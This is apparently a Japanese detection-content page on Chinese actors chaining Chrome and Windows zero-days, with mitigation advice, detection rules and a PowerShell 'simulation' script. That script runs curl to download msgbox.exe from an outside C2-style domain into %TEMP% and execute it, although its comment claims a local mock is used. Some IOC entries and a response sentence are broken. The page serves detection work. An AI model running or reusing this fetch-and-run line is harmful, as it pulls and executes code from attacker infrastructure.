中国の脅威アクターがブラウザとWindowsのゼロデイを連鎖
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
中国の脅威アクター、UTA0560とJungleBambooが、Google ChromeとWindowsカーネルをターゲットにした高度なマルチステージエクスプロイトチェーンを使用しています。攻撃は、Chromiumで脆弱性が修正されてからGoogle Chromeのリリース版に対応するアップデートが届くまでのパッチギャップ期間を利用しています。スピアフィッシングの誘い込みにより、GRIMWEDGE JScript バックドアやLONGTALE Chrome拡張機能を含むさまざまなペイロードが配信されます。
調査
Volexityのネットワークセキュリティモニタリングは、2026年9月1日にNGOを狙ったスピアフィッシングキャンペーンを特定しました。調査により、CVE-2026-85046、CVE-2026-87491、およびCVE-2026-85880を含む共有エクスプロイトチェーンが明らかになりました。アナリストは、GRIMWEDGEを展開するUTA0560と、LONGTALE拡張機能をインストールするSUPERSTOMPを使用するJungleBambooの活動を2つのクラスターに分けました。
緩和策
組織は、パッチギャップ期間中の露出を減らすために、Google Chromeを最新の利用可能なバージョンに更新する必要があります。セキュリティチームは、Chromeの異常な子プロセスの動作や許可されていないChrome拡張機能のインストールを監視すべきです。スピアフィッシングの誘い込みに対する強力なメールフィルターの実施や、不審または許可されていないスケジュールタスクの作成を監視することも推奨されます。
対応策
エクスプロイトが検出された場合、影響を受けたホストは、さらなるコマンド&コントロール通信や横方向への移動を防ぐために直ちに隔離されるべきです。対応者は、Chromeプロセスに対するメモリフォレンジックを実行して注入されたシェルコードを特定すべきです。インストールされたChrome拡張機能も監査され、 Windowsでのスケジュール済みのシステムタスク.
攻撃フロー
この部分はまだ更新中です。
検知
不審なCURL使用 (cmdline経由)
不正なトップレベルドメイン (TLD) DNSリクエストによる怪しいコマンド&コントロール (dns経由)
不審なスケジュールタスク (監査経由)
検出するためのIOC (HashSha256): パッチギャップに気をつける: 複数の中国の脅威アクターがChrome&Windowsにおける0-dayエクスプロイトをチェーン化
検出するためのIOC (SourceIP): パッチギャップに気をつける: 複数の中国の脅威アクターがChrome&Windowsにおける0-dayエクスプロイトをチェーン化
検出するためのIOC (DestinationIP): パッチギャップに気をつける: 複数の中国の脅威アクターがChrome&Windowsにおける0-dayエクスプロイトをチェーン化
Chromeゼロデイエクスプロイトチェーンのランディングページ [Webサーバー]
GRIMWEDGE JScriptバックドアとペイロード配信活動の検知 [Windowsプロセス作成]
シミュレーション実行
-
攻撃の物語とコマンド: 攻撃者は、GRIMWEDGE JScriptバックドアを展開して、侵入したシステム上での足場を確立しようとしています。単純なシグネチャベースのウイルス対策による検出を避けるため、攻撃者は
cmd.exeおよびネイティブのcurlユーティリティを使用して、次のステージのローダーであるmsgbox.exeをリモートのコマンド&コントロール (C2) インフラからダウンロードします。ダウンロードが完了すると、攻撃者は直ちにペイロードを%TEMP%ディレクトリから実行し、ファイルがディスク上にとどまる時間を最小限にし、基本的な監視では見逃されることが多いディレクトリを利用します。このシーケンスは、検出ルールが探している特定のコマンドラインパターンに一致するように設計されています。 -
リグレッションテストスクリプト:
# GRIMWEDGE検出ルールを発動させるためのシミュレーションスクリプト。 # このスクリプトは、ダウンロードされたペイロードをシミュレートするためのダミーファイルを作成します。 $tempDir = $env:TEMP $payloadName = "msgbox.exe" $payloadPath = Join-Path $tempDir $payloadName # 1. ダウンロードされたペイロードをシミュレートするためのダミー 'msgbox.exe' を作成 # 実際の攻撃では、これが本物の悪意のあるバイナリになります。 New-Item -Path $payloadPath -ItemType File -Force Set-Content -Path $payloadPath -Value "ダミーペイロードコンテンツ" # 2. 検出ロジックで特定された正確なコマンド文字列を実行します。 # 注意: コマンド文字列が正確に一致するように、URLにローカルエコー/モックアプローチを使用します。 cmd.exe /c "curl -f -sS -o ""$tempDirmsgbox.exe"" ""https://cloud.shinewrist.net/test/msgbox.exe"" && ""$tempDirmsgbox.exe""" Write-Host "シミュレーションが完了しました。SIEMでGRIMWEDGEパターンに一致するアラートを確認してください。" -
クリーンアップコマンド:
# シミュレートされたペイロードとファイルを削除するためのクリーンアップスクリプト。 $tempDir = $env:TEMP $payloadPath = Join-Path $tempDir "msgbox.exe" if (Test-Path $payloadPath) { Remove-Item -Path $payloadPath -Force Write-Host "クリーンアップ成功: $payloadPath が削除されました。" } else { Write-Host "ペイロードが見つかりません。クリーンアップは不要です。" }